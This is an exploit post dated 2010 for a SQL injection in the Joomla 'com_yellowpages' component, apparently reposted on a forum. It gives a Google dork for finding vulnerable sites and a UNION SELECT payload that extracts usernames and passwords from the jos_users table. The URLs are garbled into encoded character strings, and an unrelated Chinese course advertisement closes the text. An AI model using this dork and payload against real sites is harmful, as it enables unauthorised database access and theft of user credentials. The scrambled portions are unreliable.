# Exploit Title : Joomla "com_yellowpages" Sql Injection Vulnerability  

# Date : 9- 8 - 2010  

   

# Author : _aL_bayraqim_   

   

# BORDO BERELİLER GRUP KOMUTANLIGI [..! _al_bayragim_ ..! ..! Corti ..! ..! Aytug_Han ..! ..! Montesque ..! ..! Em3rGeNcY ..!]  

############################################################  

Dork = inurl:/index.php?option=com_yellowpages   

############################################################  

--- SQL Injection Vulenrability ---  

SQL Injection Vulenrability component "com_yellowpages"  

a67K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4y4A6N6r3g2Q4x3X3g2U0L8$3#2Q4x3V1k6A6L8X3c8W2P5q4)9J5k6i4m8Z5M7q4)9K6c8X3!0H3N6r3W2G2L8W2)9K6c8r3y4G2L8g2)9#2k6Y4W2W2L8r3I4G2N6%4m8S2k6$3g2K6i4K6t1$3j5$3q4@1i4K6y4p5x3e0V1J5x3#2)9#2b7W2y4c8e0q4)9#2c8q4)9J5y4X3&6T1M7%4m8Q4x3@1u0Q4x3U0k6F1j5Y4y4H3i4K6y4n7

############################################################  

===[ Exploit ]===  

2dcK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4A6N6r3g2Q4x3X3g2U0L8$3#2Q4x3V1k6H3j5i4c8Z5i4K6u0r3K9h3&6V1k6i4S2Q4x3X3g2H3K9s2m8Q4x3@1k6G2M7s2c8A6L8$3&6Q4x3@1c8U0L8$3#2Q4y4h3k6&6k6h3I4D9L8%4N6H3j5h3N6W2M7#2)9J5y4X3y4S2N6q4)9K6c8q4)9J5k6o6p5&6x3U0y4Q4x3V1u0g2e0V1W2a6e0W2)9J5b7W2y4q4e0p5g2o6g2l9`.`. 1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+jos_users--  

+Union+select+user()+from+jos_users--

[培训]科锐逆向工程师培训第53期2025年7月8日开班！